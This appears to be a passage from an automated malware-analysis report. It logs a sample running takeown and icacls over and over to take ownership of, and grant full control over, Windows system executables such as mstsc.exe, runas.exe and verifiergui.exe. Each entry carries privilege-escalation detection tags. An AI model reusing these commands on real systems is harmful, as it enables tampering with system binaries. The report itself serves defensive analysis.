C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\SysWOW64\raserver.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2168

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\raserver.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
- Possible privilege escalation attempt
PID:2460

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\SysWOW64\msra.exe"
2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2412

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msra.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
- Modifies file permissions
PID:2200

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\SysWOW64\quickassist.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:108

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\quickassist.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:2144

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\SysWOW64\sdchange.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3000

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdchange.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:828

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\SysWOW64\CameraSettingsUIHost.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1084

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\CameraSettingsUIHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:2988

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\SysWOW64\logagent.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2136

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\logagent.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
- Possible privilege escalation attempt
PID:1476

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\SysWOW64\rrinstaller.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:944

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\rrinstaller.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:1852

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\SysWOW64\gpscript.exe"
2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2252

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\gpscript.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
- Modifies file permissions
PID:896

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\SysWOW64\mavinject.exe"
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1772

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mavinject.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
- Modifies file permissions
PID:1712

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\SysWOW64\provlaunch.exe"
2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1520

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\provlaunch.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:1816

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\SysWOW64\msinfo32.exe"
2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:1496

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msinfo32.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
- Modifies file permissions
PID:2124

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\SysWOW64\runas.exe"
2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:560

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\runas.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
- Modifies file permissions
PID:2368

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\SysWOW64\mstsc.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2560

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mstsc.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:2576

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\SysWOW64\sdiagnhost.exe"
2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2384

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdiagnhost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:2572

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:836

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1960

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2004

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:2376

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2024

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
- Possible privilege escalation attempt
PID:1864

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:2580

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
- Modifies file permissions
PID:908

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2884

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:2480

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2904

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:2848

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2792

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:2960

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1832

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
- Modifies file permissions
PID:2664

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
PID:2192

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:2892

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
- Possible privilege escalation attempt
PID:2432

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
- Modifies file permissions
PID:2900

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1224

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:1528

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
- Modifies file permissions
PID:3052

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:2644

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
- Modifies file permissions
PID:1552

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:2632

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
- Possible privilege escalation attempt
PID:764

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
- Modifies file permissions
PID:1656

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2532

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
- Possible privilege escalation attempt
PID:924

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
PID:2556

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:2240

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2244

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:976

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2672

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:2300

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
PID:2936

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:2992

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
PID:1684

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:3076

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
- Modifies file permissions
PID:3084

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
- Possible privilege escalation attempt
PID:3104

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
- Modifies file permissions
PID:3132

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3152

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
PID:3196

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
- Possible privilege escalation attempt
PID:3220

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
PID:3264

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
- Possible privilege escalation attempt
PID:3300

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
PID:3308

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:3320

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
- Possible privilege escalation attempt
PID:3328

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
- Modifies file permissions
PID:3356

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
PID:3372

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:3412

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
PID:3432

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3444

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
- Possible privilege escalation attempt
PID:3488

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
- Modifies file permissions
PID:3504

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3536

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
- Possible privilege escalation attempt
PID:3568

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3596

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:3636

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
PID:3680

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
- Modifies file permissions
PID:3704

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
PID:3732

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
- Modifies file permissions
PID:3772

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
PID:3812

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:3840

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
PID:3848

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:3864

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3912

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:3924

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
PID:3948

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:3972

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
- Possible privilege escalation attempt
PID:3992

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:4016

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
- Modifies file permissions
PID:4028

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
- Modifies file permissions
PID:4060

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
- Possible privilege escalation attempt
PID:4076

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:2408

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
- Possible privilege escalation attempt
PID:2732

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:2984

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
PID:3012

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
- Modifies file permissions
PID:1188

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
PID:852

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:2248

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
PID:3544

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:3144

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
- Modifies file permissions
PID:536

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:2464

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
- Possible privilege escalation attempt
PID:1492

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:3340

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
PID:3484

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
- Modifies file permissions
PID:3780

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
PID:1724

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:2184

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1640

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
- Possible privilege escalation attempt
PID:1652

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
- Possible privilege escalation attempt
PID:3800

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:3876

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
PID:3824

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:2852

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3148

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
- Possible privilege escalation attempt
PID:1964

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
- Possible privilege escalation attempt
PID:1144

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
- Possible privilege escalation attempt
PID:1560

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
PID:1636

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
- Possible privilege escalation attempt
PID:4116

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
- Modifies file permissions
PID:4136

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:4168

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
- Modifies file permissions
PID:4204

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
- Modifies file permissions
PID:4216

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
PID:4252

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:4264

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
PID:4316

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:4328

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
PID:4348

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
- Possible privilege escalation attempt
PID:4376

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
- Possible privilege escalation attempt
PID:4400

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
- Modifies file permissions
PID:4436

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
PID:4448

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:4468

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
- Modifies file permissions
PID:4512

C:\Windows\System32\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\Windows\System32\verifiergui.exe" /INHERITANCE:e /GRANT:r Admin:(F)
2⤵
PID:4528

C:\Windows\System32\takeown.exe
"C:\Windows\System32\takeown.exe" /S PJCSDMRP /U Admin /F "C:\Windows\System32\verifiergui.exe"
2⤵
PID:4564

C:\Windows\System32\icacls.exe
